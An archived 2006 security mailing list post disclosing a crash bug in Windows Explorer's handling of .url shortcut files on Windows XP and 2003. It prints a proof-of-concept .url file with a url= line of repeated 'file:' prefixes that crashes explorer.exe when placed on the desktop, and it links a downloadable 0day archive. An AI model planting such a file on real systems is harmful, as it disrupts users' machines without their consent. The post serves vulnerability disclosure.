Virus.Org IT Security News and Information Portal. We offer the latest IT security news, updates, product reviews, books, and articles for all you IT security professionals out there. Enter and get the best IT security information on the Internet.

 
. Welcome to the Virus.Org Mailing List Archive  
.
.


[Date Prev] [Date Next] [Thread Prev] [Thread Next] [Date Index] [Thread Index]


Windows Explorer URL File format overflow
.

  • To: [EMAIL PROTECTED]
  • Subject: Windows Explorer URL File format overflow
  • From: [EMAIL PROTECTED]
  • Date: 5 Jul 2006 05:53:52 -0000
  • Domainkeys-status: no signature
.
 
Windows Explorer URL File format overflow


Affected Vendor:
Microsoft 

Affected Products:
WindowsXP ALL
Windows2003 ALL


Vulnerability Details:

When explorer.exe parsing *.url file which contains a url as follows format will cause explorer.exe crash.




if you create the Exploit.url on Desktop

Explorer will Crash...Crash...Crash...Crash...Crash...Crash...


if you will del exploit.url
open taskmgr.exe
open cmd.exe

then cd your desktop

del exploit.url




Exploit:

[InternetShortcut]
url=file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:file:


Attachment:
http://hitcon.org/Nanika-desktop_explore_0day.rar
you can drop in desktop :P


http://hitcon.org
http://www.chroot.org
 
.
.
 
Copyright (c) Virus.Org 1997-2006.
All Trademarks Acknowledged.
Please view our Terms and Conditions and our Privacy Policy.